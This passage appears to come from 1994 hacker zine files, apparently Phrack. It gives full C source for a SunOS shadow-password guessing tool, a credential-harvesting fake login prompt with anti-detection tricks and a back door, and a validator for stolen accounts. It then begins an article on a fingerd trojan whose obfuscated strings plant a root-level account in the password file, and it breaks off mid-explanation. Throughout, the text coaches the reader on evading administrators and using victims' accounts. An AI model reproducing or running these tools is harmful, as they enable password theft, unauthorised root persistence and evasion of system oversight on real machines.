Administrator:/:/bin/csh with the 'shadow' password file taking roughly the same format as that of Sys V, usually with some extra fields. However, we cannot use a program like CRACK, but SUNOS also supplied a function called pwdauth(), which basically takes two arguments, a login name and decrypted password, which is then encrypted and compared to the appropriate entry in the shadow file, thus if it matches, we have a valid i.d. & password, if not, we don't. I therefore decided to write a program which would exploit this function, and could be used to get valid i.d's and passwords even on a shadowed system! To my knowledge the use of the pwdauth() function is not logged, but I could be wrong. I have left it running for a while on the system I use and it has attracted no attention, and the administrator knows his shit. I have seen the functions getspwent() and getspwnam() in Sys V to manipulate the shadow password file, but not a function like pwdauth() that will actually validate the i.d. and password. If such a function does exist on other shadowed systems then this program could be very easily modified to work without problems. The only real beef I have about this program is that because the pwdauth() function uses the standard unix crypt() function to encrypt the supplied password, it is very slow!!! Even in burst mode, a password file with 1000's of users could take a while to get through. My advice is to run it in the background and direct all its screen output to /dev/null like so :- shcrack -mf -uroot -ddict1 > /dev/null & Then you can log out then come back and check on it later! The program works in a number of modes, all of which I will describe below, is command line driven, and can be used to crack both multiple accounts in the password file and single accounts specified. It is also NIS/NFS (Sun Yellow Pages) compatible. How to use it ------------- shcrack -m[mode] -p[password file] -u[user id] -d[dictionary file] Usage :- -m[mode] there are 3 modes of operation :- -mb Burst mode, this scans the password file, trying the minimum number of password guessing strategies on every account. -mi Mini-burst mode, this also scans the password file, and tries most password guessing strategies on every account. -mf Brute-force mode, tries all password strategies, including the use of words from a dictionary, on a single account specified. more about these modes in a sec, the other options are :- -p[password file] This is the password file you wish to use, if this is left unspecified, the default is /etc/passwd. NB: The program automatically detects and uses the password file wherever it may be in NIS/NFS systems. -u[user id] The login i.d. of the account you wish to crack, this is used in Brute-force single user mode. -d[dict file] This uses the words in a dictionary file to generate possible passwords for use in single user brute force mode. If no filename is specified, the program only uses the password guessing strategies without using the dictionary. Modes ^^^^^ -mb Burst mode basically gets each account from the appropriate password file and uses two methods to guess its password. Firstly, it uses the account name as a password, this name is then reversed and tried as a possible password. This may seem like a weak strategy, but remember, the users passwords are already shadowed, and therefore are deemed to be secure. This can lead to sloppy passwords being used, and I have came across many cases where the user has used his/her i.d. as a password. -mi Mini-burst mode uses a number of other password generating methods as well as the 2 listed in burst mode. One of the methods involves taking the login i.d. of the account being cracked, and appending the numbers 0 to 9 to the end of it to generate possible passwords. If this mode has no luck, it then uses the accounts gecos 'comment' information from the password file, splitting it into words and trying these as passwords. Each word from the comment field is also reversed and tried as a possible password. -mf Brute-force single user mode uses all the above techniques for password guessing as well as using a dictionary file to provide possible passwords to crack a single account specified. If no dictionary filename is given, this mode operates on the single account using the same methods as mini-burst mode, without the dictionary. Using shadow crack ------------------ To get program help from the command line just type :- $ shcrack which will show you all the modes of operation. If you wanted to crack just the account 'root', located in /etc/passwd(or elsewhere on NFS/NIS systems), using all methods including a dictionary file called 'dict1', you would do :- $ shcrack -mf -uroot -ddict1 to do the above without using the dictionary file, do :- $ shcrack -mf -uroot or to do the above but in password file 'miner' do :- $ shcrack -mf -pminer -uroot to start cracking all accounts in /etc/passwd, using minimum password strategies do :- $ shcrack -mb to do the above but on a password file called 'miner' in your home directory do :- $ shcrack -mb -pminer to start cracking all accounts in 'miner', using all strategies except dictionary words do :- $ shcrack -mi -pminer ok, heres the code, ANSI C Compilers only :- ---cut here------------------------------------------------------------------- /* Program : Shadow Crack Author : (c)1994 The Shining/UPi (UK Division) Date : Released 12/4/94 Unix type : SUNOS Shadowed systems only */ #include #include #include #include #include #define WORDSIZE 20 /* Maximum word size */ #define OUTFILE "data" /* File to store cracked account info */ void word_strat( void ), do_dict( void ); void add_nums( char * ), do_comment( char * ); void try_word( char * ), reverse_word( char * ); void find_mode( void ), burst_mode( void ); void mini_burst( void ), brute_force( void ); void user_info( void ), write_details( char * ); void pwfile_name( void ), disable_interrupts( void ), cleanup(); char *logname, *comment, *homedir, *shell, *dict, *mode, *pwfile, *pwdauth(); struct passwd *getpwnam(), *pwentry; extern char *optarg; int option, uid, gid; int main( int argc, char **argv ) { disable_interrupts(); system("clear"); if (argc < 2) { printf("Shadow Crack - (c)1994 The Shining\n"); printf("SUNOS Shadow password brute force cracker\n\n"); printf("useage: %s -m[mode] -p[pwfile] -u[loginid] ", argv[0]); printf("-d[dictfile]\n\n\n"); printf("[b] is burst mode, scans pwfile trying minimum\n"); printf(" password strategies on all i.d's\n\n"); printf("[i] is mini-burst mode, scans pwfile trying both\n"); printf(" userid, gecos info, and numbers to all i.d's\n\n"); printf("[f] is bruteforce mode, tries all above stategies\n"); printf(" as well as dictionary words\n\n"); printf("[pwfile] Uses the password file [pwfile], default\n"); printf(" is /etc/passwd\n\n"); printf("[loginid] Account you wish to crack, used with\n"); printf(" -mf bruteforce mode only\n\n"); printf("[dictfile] uses dictionary file [dictfile] to\n"); printf(" generate passwords when used with\n"); printf(" -mf bruteforce mode only\n\n"); exit(0); } /* Get options from the command line and store them in different variables */ while ((option = getopt(argc, argv, "m:p:u:d:")) != EOF) switch(option) { case 'm': mode = optarg; break; case 'p': pwfile = optarg; break; case 'u': logname = optarg; break; case 'd': dict = optarg; break; default: printf("wrong options\n"); break; } find_mode(); } /* Routine to redirect interrupts */ void disable_interrupts( void ) { signal(SIGHUP, SIG_IGN); signal(SIGTSTP, cleanup); signal(SIGINT, cleanup); signal(SIGQUIT, cleanup); signal(SIGTERM, cleanup); } /* If CTRL-Z or CTRL-C is pressed, clean up & quit */ void cleanup( void ) { FILE *fp; if ((fp = fopen("gecos", "r")) != NULL) remove("gecos"); if ((fp = fopen("data", "r")) == NULL) printf("\nNo accounts cracked\n"); printf("Quitting\n"); exit(0); } /* Function to decide which mode is being used and call appropriate routine */ void find_mode( void ) { if (strcmp(mode, "b") == NULL) burst_mode(); else if (strcmp(mode, "i") == NULL) mini_burst(); else if (strcmp(mode, "f") == NULL) brute_force(); else { printf("Sorry - No such mode\n"); exit(0); } } /* Get a users information from the password file */ void user_info( void ) { uid = pwentry->pw_uid; gid = pwentry->pw_gid; comment = pwentry->pw_gecos; homedir = pwentry->pw_dir; shell = pwentry->pw_shell; } /* Set the filename of the password file to be used, default is /etc/passwd */ void pwfile_name( void ) { if (pwfile != NULL) setpwfile(pwfile); } /* Burst mode, tries user i.d. & then reverses it as possible passwords on every account found in the password file */ void burst_mode( void ) { pwfile_name(); setpwent(); while ((pwentry = getpwent()) != (struct passwd *) NULL) { logname = pwentry->pw_name; user_info(); try_word( logname ); reverse_word( logname ); } endpwent(); } /* Mini-burst mode, try above combinations as well as other strategies which include adding numbers to the end of the user i.d. to generate passwords or using the comment field information in the password file */ void mini_burst( void ) { pwfile_name(); setpwent(); while ((pwentry = getpwent()) != (struct passwd *) NULL) { logname = pwentry->pw_name; user_info(); word_strat(); } endpwent(); } /* Brute force mode, uses all the above strategies as well using a dictionary file to generate possible passwords */ void brute_force( void ) { pwfile_name(); setpwent(); if ((pwentry = getpwnam(logname)) == (struct passwd *) NULL) { printf("Sorry - User unknown\n"); exit(0); } else { user_info(); word_strat(); do_dict(); } endpwent(); } /* Calls the various password guessing strategies */ void word_strat() { try_word( logname ); reverse_word( logname ); add_nums( logname ); do_comment( comment ); } /* Takes the user name as its argument and then generates possible passwords by adding the numbers 0-9 to the end. If the username is greater than 7 characters, don't bother */ void add_nums( char *wd ) { int i; char temp[2], buff[WORDSIZE]; if (strlen(wd) < 8) { for (i = 0; i < 10; i++) { strcpy(buff, wd); sprintf(temp, "%d", i); strcat(wd, temp); try_word( wd ); strcpy(wd, buff); } } } /* Gets info from the 'gecos' comment field in the password file, then process this information generating possible passwords from it */ void do_comment( char *wd ) { FILE *fp; char temp[2], buff[WORDSIZE]; int c, flag; flag = 0; /* Open file & store users gecos information in it. w+ mode allows us to write to it & then read from it. */ if ((fp = fopen("gecos", "w+")) == NULL) { printf("Error writing gecos info\n"); exit(0); } fprintf(fp, "%s\n", wd); rewind(fp); strcpy(buff, ""); /* Process users gecos information, separate words by checking for the ',' field separater or a space. */ while ((c = fgetc(fp)) != EOF) { if (( c != ',' ) && ( c != ' ' )) { sprintf(temp, "%c", c); strncat(buff, temp, 1); } else flag = 1; if ((isspace(c)) || (c == ',') != NULL) { if (flag == 1) { c=fgetc(fp); if ((isspace(c)) || (iscntrl(c) == NULL)) ungetc(c, fp); } try_word(buff); reverse_word(buff); strcpy(buff, ""); flag = 0; strcpy(temp, ""); } } fclose(fp); remove("gecos"); } /* Takes a string of characters as its argument(in this case the login i.d., and then reverses it */ void reverse_word( char *wd ) { char temp[2], buff[WORDSIZE]; int i; i = strlen(wd) + 1; strcpy(temp, ""); strcpy(buff, ""); do { i--; if ((isalnum(wd[i]) || (ispunct(wd[i]))) != NULL) { sprintf(temp, "%c", wd[i]); strncat(buff, temp, 1); } } while(i != 0); if (strlen(buff) > 1) try_word(buff); } /* Read one word at a time from the specified dictionary for use as possible passwords, if dictionary filename is NULL, ignore this operation */ void do_dict( void ) { FILE *fp; char buff[WORDSIZE], temp[2]; int c; strcpy(buff, ""); strcpy(temp, ""); if (dict == NULL) exit(0); if ((fp = fopen(dict, "r")) == NULL) { printf("Error opening dictionary file\n"); exit(0); } rewind(fp); while ((c = fgetc(fp)) != EOF) { if ((c != ' ') || (c != '\n')) { strcpy(temp, ""); sprintf(temp, "%c", c); strncat(buff, temp, 1); } if (c == '\n') { if (buff[0] != ' ') try_word(buff); strcpy(buff, ""); } } fclose(fp); } /* Process the word to be used as a password by stripping \n from it if necessary, then use the pwdauth() function, with the login name and word to attempt to get a valid id & password */ void try_word( char pw[] ) { int pwstat, i, pwlength; char temp[2], buff[WORDSIZE]; strcpy(buff, ""); pwlength = strlen(pw); for (i = 0; i != pwlength; i++) { if (pw[i] != '\n') { strcpy(temp, ""); sprintf(temp, "%c", pw[i]); strncat(buff, temp, 1); } } if (strlen(buff) > 3 ) { printf("Trying : %s\n", buff); if (pwstat = pwdauth(logname, buff) == NULL) { printf("Valid Password! - writing details to 'data'\n"); write_details(buff); if (strcmp(mode, "f") == NULL) exit(0); } } } /* If valid account & password, store this, along with the accounts uid, gid, comment, homedir & shell in a file called 'data' */ void write_details( char *pw ) { FILE *fp; if ((fp = fopen(OUTFILE, "a")) == NULL) { printf("Error opening output file\n"); exit(0); } fprintf(fp, "%s:%s:%d:%d:", logname, pw, uid, gid); fprintf(fp, "%s:%s:%s\n", comment, homedir, shell); fclose(fp); } ---cut here------------------------------------------------------------------- again to compile it do :- $ gcc shcrack.c -o shcrack or $ acc shcrack.c -o shcrack this can vary depending on your compiler. The Ultimate Login Spoof ^^^^^^^^^^^^^^^^^^^^^^^^ Well this subject has been covered many times before but its a while since I have seen a good one, and anyway I thought other unix spoofs have had two main problems :- 1) They were pretty easy to detect when running 2) They recorded any only shit entered..... Well now I feel these problems have been solved with the spoof below. Firstly, I want to say that no matter how many times spoofing is deemed as a 'lame' activity, I think it is very underestimated. When writing this I have considered every possible feature such a program should have. The main ones are :- 1) To validate the entered login i.d. by searching for it in the password file. 2) Once validated, to get all information about the account entered including - real name etc from the comment field, homedir info (e.g. /homedir/miner) and the shell the account is using and store all this in a file. 3) To keep the spoofs tty idle time to 0, thus not to arouse the administrators suspicions. 4) To validates passwords before storing them, on all unshadowed unix systems & SUNOS shadowed/unshadowed systems. 5) To emulates the 'sync' dummy account, thus making it act like the real login program. 6) Disable all interrupts(CTRL-Z, CTRL-D, CTRL-C), and automatically quit if it has not grabbed an account within a specified time. 7) To automatically detect & display the hostname before the login prompt e.g. 'ccu login:', this feature can be disabled if desired. 8) To run continuously until a valid i.d. & valid password are entered. As well as the above features, I also added a few more to make the spoof 'foolproof'. At university, a lot of the users have been 'stung' by login spoofs in the past, and so have become very conscious about security. For example, they now try and get around spoofs by entering any old crap when prompted for their login name, or to hit return a few times, to prevent any 'crappy' spoofs which may be running. This is where my spoof shines!, firstly if someone was to enter - login: dhfhfhfhryr Password: into the spoof, it checks to see if the login i.d. entered is valid by searching for it in the password file. If it exists, the spoof then tries to validate the password. If both the i.d. & password are valid, these will be stored in a file called .data, along with additional information about the account taken directly from the password file. Now if, as in the case above, either the login name or password is incorrect, the information is discarded, and the login spoof runs again, waiting for a valid user i.d. & password to be entered. Also, a lot of systems these days have an unpassworded account called 'sync', which when logged onto, usually displays the date & time the sync account was last logged into, and from which server or tty, the message of the day, syncs the disk, and then logs you straight out. A few people have decided that the best way to dodge login spoofs is to first login to this account then when they are automatically logged out, to login to their own account. They do this firstly, so that if a spoof is running it only records the details of the sync account and secondly the spoof would not act as the normal unix login program would, and therefore they would spot it and report it, thus landing you in the shit with the system administrator. However, I got around this problem so that when someone tries to login as sync (or another account of a similar type, which you can define), it acts exactly like the normal login program would, right down to displaying the system date & time as well as the message of the day!! The idle time facility ---------------------- One of the main problems with unix spoofs, is they can be spotted so easily by the administrator, as he/she could get a list of current users on the system and see that an account was logged on, and had been idle for maybe 30 minutes. They would then investigate & the spoof would be discovered. I have therefore incorporated a scheme in the spoof whereby approx. every minute, the tty the spoof is executed from, is 'touched' with the current time, this effectively simulates terminal activity & keeps the terminals idle time to zero, which helps the spoofs chances of not being discovered greatly. The spoof also incorporates a routine which will automatically keep track of approximately how long the spoof has been running, and if it has been running for a specified time without grabbing an i.d. or password, will automatically exit and run the real login program. This timer is by default set to 12.5 minutes, but you can alter this time if you wish. Note: Due to the varying processing power of some systems, I could not set the timer to exactly 60 seconds, I have therefore set it to 50, incase it loses or gains extra time. Take this into consideration when setting the spoofs timer to your own value. I recommend you stick with the default, and under no circumstances let it run for hours. Password Validation techniques ------------------------------ The spoof basically uses 2 methods of password validation(or none at all on a shadowed system V). Firstly, when the spoof is used on any unix with an unshadowed password file, it uses the crypt function to validate a password entered. If however the system is running SUNOS 4.1.+ and incorporates the shadow password system, the program uses a function called pwdauth(). This takes the login i.d. & decrypted password as its arguments and checks to see if both are valid by encrypting the password and comparing it to the shadowed password file which is usually located in /etc/security and accessible only by root. By validating both the i.d. & password we ensure that the data which is saved to file is correct and not any old bullshit typed at the terminal!!! Executing the Spoof ------------------- ok, now about the program. This is written in ANSI-C, so I hope you have a compatible compiler, GCC or suns ACC should do it. Now the only time you will need to change to the code is in the following circumstances :- 1) If you are to compile & run it on an unshadowed unix, in which case remove all references to the pwdauth() function, from both the declarations & the shadow checking routine, add this code in place of the shadow password checking routine :- if ( shadow == 1 ) { invalid = 0; else invalid = 1; } 2) Add the above code also to the spoof if you are running this on a system V which is shadowed. In this case the spoof loses its ability to validate the password, to my knowledge there is no sysV equivalent of the pwdauth() function. Everything else should be pretty much compatible. You should have no problems compiling & running this on an unshadowed SUNOS machine, if you do, make the necessary changes as above, but it compiled ok on every unshadowed SUNOS I tested it on. The Spoof should automatically detect whether a SUNOS system is shadowed or unshadowed and run the appropriate code to deal with each situation. Note: when you have compiled this spoof, you MUST 'exec' it from the current shell for it to work, you must also only have one shell running. e.g. from C or Bourne shell using the GNU C Compiler do :- $ gcc spoof.c -o spoof $ exec spoof This replaces the current shell with the spoof, so when the spoof quits & runs the real login program, the hackers account is effectively logged off. ok enough of the bullshit, here's the spoof :- ----------cut here------------------------------------------------------- /* Program : Unix login spoof Author : The Shining/UPi (UK Division) Date : Released 12/4/94 Unix Type : All unshadowed unix systems & shadowed SUNOS systems Note : This file MUST be exec'd from the shell. */ #include #include #include #include #include #include #define OUTFILE ".data" /* Data file to save account info into */ #define LOGPATH "/usr/bin/login" /* Path of real login program */ #define DUMMYID "sync" /* Dummy account on your system */ #define DLENGTH 4 /* Length of dummy account name */ FILE *fp; /* Set up variables to store system time & date */ time_t now; static int time_out, time_on, no_message, loop_cnt; /* Set up a structure to store users information */ struct loginfo { char logname[10]; char key[9]; char *comment; char *homedir; char *shell; } u; /* Use the unix function getpass() to read user password and crypt() or pwdauth() (remove it below if not SUNOS) to validate it etc */ char *getpass(), *gethostname(), *alarm(), *sleep(), *crypt(), *ttyname(), *pwdauth(), motd, log_date[60], pass[14], salt[3], *tty, cons[] = " on console ", hname[72], *ld; /* flag = exit status, ppid = pid shell, wait = pause length, pwstat = holds 0 if valid password, shadow holds 1 if shadow password system is being used, 0 otherwise. */ int flag, ppid, wait, pwstat, shadow, invalid; /* Declare main functions */ void write_details(struct loginfo *); void catch( void ), disable_interrupts( void ); void log_out( void ), get_info( void ), invalid_login( void ), prep_str( char * ); /* set up pointer to point to pwfile structure, and also a pointer to the utime() structure */ struct passwd *pwentry, *getpwnam(); struct utimbuf *times; int main( void ) { system("clear"); /* Initialise main program variables to 0, change 'loop_cnt' to 1 if you do not want the machines host name to appear with the login prompt! (e.g. prompt is `login:` instead of 'MIT login:' etc) */ wait = 3; /* Holds value for pause */ flag = 0; /* Spoof ends if value is 1 */ loop_cnt = 0; /* Change this to 1 if no host required */ time_out = 0; /* Stops timer if spoof has been used */ time_on = 0; /* Holds minutes spoof has been running */ disable_interrupts(); /* Call function to disable Interrupts */ /* Get system time & date and store in log_date, this is displayed when someone logs in as 'sync' */ now = time(NULL); strftime(log_date, 60, "Last Login: %a %h %d %H:%M:%S", localtime(&now)); strcat(log_date, cons); ld = log_date; /* Get Hostname and tty name */ gethostname(hname, 64); strcat(hname, " login: "); tty = ttyname(); /* main routine */ while( flag == 0 ) { invalid = 0; /* Holds 1 if id +/or pw are invalid */ shadow = 0; /* 1 if shadow scheme is in operation */ no_message = 0; /* Flag for Login Incorrect msg */ alarm(50); /* set timer going */ get_info(); /* get user i.d. & password */ /* Check to see if the user i.d. entered is 'sync', if it is display system time & date, display message of the day and then run the spoof again, insert the account of your choice here, if its not sync, but remember to put the length of the accounts name next to it! */ if (strncmp(u.logname, DUMMYID, DLENGTH) == NULL) { printf("%s\n", ld); if ((fp = fopen("/etc/motd", "r")) != NULL) { while ((motd = getc(fp)) != EOF) putchar(motd); fclose(fp); } printf("\n"); prep_str(u.logname); no_message = 1; sleep(wait); } /* Check if a valid user i.d. has been input, then check to see if the password system is shadowed or unshadowed. If both the user i.d. & password are valid, get additional info from the password file, and store all info in a file called .data, then exit spoof and run real login program */ setpwent(); /* Rewind pwfile to beign processing */ if ((pwentry = getpwnam(u.logname)) == (struct passwd *) NULL) { invalid = 1; flag = 0; } else strncpy(salt, pwentry->pw_passwd, 2); /* Check for shadowed password system, in SUNOS, the field in /etc/passwd should begin with '##', in system V it could contain an 'x', if none of these exist, it checks that the entry = 13 chars, if less then shadow system will probably be implemented (unless acct has been disabled) */ if ( invalid == 0 ) { if ((strcmp(salt, "##")) || (strncmp(salt, "x", 1)) == NULL) shadow = 1; else if (strlen(pwentry->pw_passwd) < 13) shadow = 1; /* If unshadowed, use the salt from the pwfile field & the key to form the encrypted password which is checked against the entry in the password file, if it matches, then all is well, if not, spoof runs again!! */ if ( shadow != 1 ) { if (strcmp(pwentry->pw_passwd, crypt(u.key, salt)) == NULL) invalid = 0; else invalid = 1; } /* If SUNOS Shadowing is in operation, use the pwdauth() function to validate the password, if not SUNOS, substitute this code with the routine I gave earlier! */ if ( shadow == 1 ) { if (pwstat = pwdauth(u.logname, u.key) == NULL) invalid = 0; else invalid = 1; } } /* If we have a valid account & password, get user info from the pwfile & store it */ if ( invalid == 0 ) { u.comment = pwentry->pw_gecos; u.homedir = pwentry->pw_dir; u.shell = pwentry->pw_shell; /* Open file to store user info */ if ((fp = fopen(OUTFILE, "a")) == NULL) log_out(); write_details(&u); fclose(fp); no_message = 1; flag = 1; } else flag = 0; invalid_login(); endpwent(); /* Close pwfile */ if (no_message == 0) loop_cnt++; } /* end while */ log_out(); /* call real login program */ } /* Function to read user i.d. & password */ void get_info( void ) { char user[11]; unsigned int string_len; fflush(stdin); prep_str(u.logname); prep_str(u.key); strcpy(user, "\n"); /* Loop while some loser keeps hitting return when asked for user i.d. and if someone hits CTRL-D to break out of spoof. Enter a # at login to exit spoof. Uncomment the appropriate line(s) below to customise the spoof to look like your system */ while ((strcmp(user, "\n") == NULL) && (!feof(stdin))) { /* printf("Scorch Ltd SUNOS 4.1.3\n\n); */ if (loop_cnt > 0) strcpy(hname, "login: "); printf("%s", hname); fgets(user, 9, stdin); /* Back door for hacker, # at present, can be changed, but leave \n in. */ if (strcmp(user, "#\n") == NULL) exit(0); /* Strip \n from login i.d. */ if (strlen(user) < 8) string_len = strlen(user) - 1; else string_len = strlen(user); strncpy(u.logname, user, string_len); /* check to see if CTRL-D has occurred because it does not generate an interrupt like CTRL-C, but instead generates an end-of-file on stdin */ if (feof(stdin)) { clearerr(stdin); printf("\n"); } } /* Turn off screen display & read users password */ strncpy(u.key, getpass("Password:"), 8); } /* Function to increment the timer which holds the amount of time the spoof has been running */ void catch( void ) { time_on++; /* If spoof has been running for 15 minutes, and has not been used, stop timer and call spoof exit routine */ if ( time_out == 0 ) { if (time_on == 15) { printf("\n"); alarm(0); log_out(); } } /* 'Touch' your tty, effectively keeping terminal idle time to 0 */ utime(tty, times); alarm(50); } /* Initialise a string with \0's */ void prep_str( char str[] ) { int strl, cnt; strl = strlen(str); for (cnt = 0; cnt != strl; cnt++) str[cnt] = ' '; } /* function to catch interrupts, CTRL-C & CTRL-Z etc as well as the timer signals */ void disable_interrupts( void ) { signal(SIGALRM, catch); signal(SIGQUIT, SIG_IGN); signal(SIGTERM, SIG_IGN); signal(SIGINT, SIG_IGN); signal(SIGTSTP, SIG_IGN); } /* Write the users i.d., password, personal information, homedir and shell to a file */ void write_details(struct loginfo *sptr) { fprintf(fp, "%s:%s:", sptr->logname, sptr->key); fprintf(fp, "%d:%d:", pwentry->pw_uid, pwentry->pw_gid); fprintf(fp, "%s:%s:", sptr->comment, sptr->homedir); fprintf(fp, "%s\n", sptr->shell); fprintf(fp, "\n"); } /* Display login incorrect only if the user hasn't logged on as 'sync' */ void invalid_login( void ) { if ( flag == 1 && pwstat == 0 ) sleep(wait); if ( no_message == 0 ) printf("Login incorrect\n"); } /* Displays appropriate message, exec's the real login program, this replaces the spoof & effectively logs spoof's account off. Note: this spoof must be exec'd from the shell to work */ void log_out( void ) { time_out = 1; if ( no_message == 1 ) { sleep(1); printf("Login incorrect\n"); } execl(LOGPATH, "login", (char *)0); } ----------cut here------------------------------------------------------- then delete the source, run it and wait for some sucker to login!. If you do initially run this spoof from your account, I suggest you remove it when you have grabbed someone's account and run it from theirs from then on, this reduces your chances of being caught! User i.d. & Password Validator ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Now if you are familiar with the unix Crack program, as I'm sure most of you are ;-), or if you have used my spoof to grab some accounts, this little program could be of some use. Say you have snagged quit a few accounts, and a few weeks later you wanna see if they are still alive, instead of logging onto them, then logging out again 20 or 30 times which can take time, and could get the system admin looking your way, this program will continuously ask you to enter a user i.d. & password, then validate them both by actually using the appropriate entry in the password file. All valid accounts are then stored along with other info from the password file, in a data file. The program loops around until you stop it. This works on all unshadowed unix systems, and, you guessed it!, shadowed SUNOS systems. If you run it on an unshadowed unix other than SUNOS, remove all references to pwdauth(), along with the shadow password file checking routine, if your on sysV, your shit outa luck! anyway, here goes :- ---cut here--------------------------------------------------------------- /* Program : To validate accounts & passwords on both shadowed & unshadowed unix systems. Author : The Shining/UPi (UK Division) Date : Released 12/4/94 UNIX type : All unshadowed systems, and SUNOS shadowed systems */ #include #include #include FILE *fp; int pw_system( void ), shadowed( void ), unshadowed( void ); void write_info( void ), display_notice( void ); struct passwd *pwentry, *getpwnam(); struct user { char logname[10]; char key[9]; char salt[3]; } u; char *getpass(), *pwdauth(), *crypt(), ans[2]; int invalid_user, stat; int main( void ) { strcpy(ans, "y"); while (strcmp(ans, "y") == NULL) { invalid_user = stat = 0; display_notice(); printf("Enter login id:"); scanf("%9s", u.logname); strcpy(u.key, getpass("Password:")); setpwent(); if ((pwentry = getpwnam(u.logname)) == (struct passwd *) NULL) invalid_user = 1; else strncpy(u.salt, pwentry->pw_passwd, 2); if (invalid_user != 1) { if ((stat = pw_system()) == 1) { if ((stat = unshadowed()) == NULL) { printf("Unshadowed valid account! - storing details\n"); write_info(); } } else if ((stat = shadowed()) == NULL) { printf("SUNOS Shadowed valid account! - storing details\n"); write_info(); } else invalid_user = 2; } if (invalid_user == 1) printf("User unknown/not found in password file\n"); if (invalid_user == 2 ) printf("Password invalid\n"); printf("\n\nValidate another account?(y/n): "); scanf("%1s", ans); endpwent(); } } /* Check to see if shadow password system is used, in SUNOS the field in /etc/passwd starts with a '#', if not, check to see if entry is 13 chars, if not shadow must be in use. */ int pw_system( void ) { if (strlen(pwentry->pw_passwd) != 13) return(0); else if (strcmp(u.salt, "##") == NULL) return(0); else return(1); } /* If system is unshadowed, get the 2 character salt from the password file, and use this to encrypt the password entered. This is then compared against the password file entry. */ int unshadowed( void ) { if (pwentry->pw_passwd == crypt(u.key, u.salt)) return(0); else return(1); } /* If SUNOS shadowe system is used, use the pwdauth() function to validate the password stored in the /etc/security/passwd.adjunct file */ int shadowed( void ) { int pwstat; if (pwstat = pwdauth(u.logname, u.key) == NULL) return(0); else return(1); } /* Praise myself!!!! */ void display_notice( void ) { system("clear"); printf("Unix Account login id & password validator.\n"); printf("For all unshadowed UNIX systems & shadowed SUNOS only.\n\n"); printf("(c)1994 The Shining\n\n\n\n"); } /* Open a file called 'data' and store account i.d. & password along with other information retrieved from the password file */ void write_info( void ) { /* Open a file & store account information from pwfile in it */ if ((fp = fopen("data", "a")) == NULL) { printf("error opening output file\n"); exit(0); } fprintf(fp, "%s:%s:%d:", u.logname, u.key, pwentry->pw_uid); fprintf(fp, "%d:%s:", pwentry->pw_gid, pwentry->pw_gecos); fprintf(fp, "%s:%s\n", pwentry->pw_dir, pwentry->pw_shell); fclose(fp); } -----cut here------------------------------------------------------------------ The above programs will not compile under non-ansi C compilers without quite a bit of modification. I have tested all these programs on SUNOS both shadowed & unshadowed, though they should work on other systems with little modification (except the shadow password cracker, which is SUNOS shadow system specific). Regards to the following guys :- Archbishop & The Lost Avenger/UPi, RamRaider/QTX, the guys at United International Perverts(yo Dirty Mac & Jasper!) and all I know. (c) 1994 The Shining (The NORTH!, U.K.) ******************************************************************************* ==Phrack Magazine== Volume Five, Issue Forty-Six, File 12 of 28 **************************************************************************** The fingerd trojan horse Original article by Hitman Italy for Phrack Inc. This article is for informational purpose only, I'm not liable for any damage or illegal activity perpetrated using the source or the informations in the article. -=- + - So you have gained access to a system and want to keep on hacking without being kicked off by a smart operator, there are dozen methods you can use, usually, if an operator figure out that his system is under attack, he'll check out the login program and telnetd for backdoors, then the telnet for logging activities or network sniffers and so on.. if nothing is found he'll realize the hacker is a dumb ass and he'll just modify the passwd to prevent him from logging on (in most cases), here comes my fingerd trojan. This scheme is quite original (I've never seen it used) and the source is compact enough to be fitted into a MAG. The fingerd as all you know (I hope) is the finger server run by inetd when a client opens the finger port (N.79), of course if the port is locked, or you have a network firewall, do not use this code. ---------- + CUT HERE + ----------------------------------------------- /* The Fingerd trojan by Hitman Italy * This source cannot be spread without the whole article * but you can freely implement or modify it for personal use */ static char copyright[] = ""; /* Add the copyright string here */ static char sccsid[] = ""; /* Add the sccsid string here */ #include #define PATH_FINGER "/usr/ucb/finger" #define CODE 161 char *HitCrypt(ch) char *ch; { char *b; b=ch; while ((*(ch++)^=CODE)!=0x00); return(b); } main(argc,argv) int argc; char *argv[]; { register FILE *fp; register int ch; register char *lp; int p[2]; static char exor[4][23]={ {201,200,213,CODE}, {142,196,213,194,142,209,192,210,210,214,197,CODE}, {201,200,213,155,155,145,155,145,155,155,142,155,142,195,200,207,142,194, 210,201,CODE}, {227,192,194,202,197,206,206,211,129,192,194,213,200,215,192,213,196,197, 143,143,143,CODE} }; #define ENTRIES 50 char **ap, *av[ENTRIES + 1], line[1024], *strtok(); #ifdef LOGGING /* unused, leave it for "strings" command */ #include struct sockaddr_in sin; int sval; sval = sizeof(sin); if (getpeername(0, &sin, &sval) < 0) fatal(argv[0],"getpeername"); #endif if (!fgets(line, sizeof(line), stdin)) exit(1); av[0] = "finger"; for (lp = line, ap = &av[1];;) { *ap = strtok(lp, " \t\r\n"); if (!*ap) break; if ((*ap)[0] == '/' && ((*ap)[1] == 'W' || (*ap)[1] == 'w')) *ap = "-l"; if (++ap == av + ENTRIES) break; lp = NULL; } if (pipe(p) < 0) fatal(argv[0],"pipe"); switch(fork()) { case 0: (void)close(p[0]); if (p[1] != 1) { (void)dup2(p[1], 1); (void)close(p[1]); } /*-=-=-=-=-=- PUT HERE YOUR CODE -=-=-=-=-=-*/ if (av[1]) if (strcmp( (HitCrypt(&exor[0][0])) ,av[1])==0) { if(!(fp=fopen( (HitCrypt(&exor[1][0])) ,"a"))) _exit(10); fprintf(fp,"%s\n", HitCrypt(&exor[2][0])); printf("%s\n", HitCrypt(&exor[3][0])); fclose(fp); break; } /*-=-=-=-=-=- END OF CUSTOM CODE =-=-=-=-=-=-*/ if (execv(PATH_FINGER, av)==-1) fprintf(stderr,"No local finger program found\n"); _exit(1); case -1: fatal(argv[0],"fork"); } (void)close(p[1]); if (!(fp = fdopen(p[0], "r"))) fatal(argv[0],"fdopen"); while ((ch = getc(fp)) != EOF) { putchar(ch); } exit(0); } fatal(prg,msg) char *prg,*msg; { fprintf(stderr, "%s: ", prg); perror(msg); exit(1); } --------- + CUT HERE + ---------------------------------------------- I think it's quite easy to understand, first of all, inetd opens the socket and pipes the the input data through the fingerd * if (!fgets(line, sizeof(line), stdin)) * exit(1); * av[0] = "finger"; * for (lp = line, ap = &av[1];;) { * *ap = strtok(lp, " \t\r\n"); * if (!*ap) * break; * if ((*ap)[0] == '/' && ((*ap)[1] == 'W' || (*ap)[1] == 'w')) * *ap = "-l"; here it gets the data from stdin and parses them (strtok) converting (due to RFC742) any '/W' or '/w' old options in '-l' * switch(fork()) { * case 0: * (void)close(p[0]); * if (p[1] != 1) { * (void)dup2(p[1], 1); * (void)close(p[1]); * } the task goes into the background * if 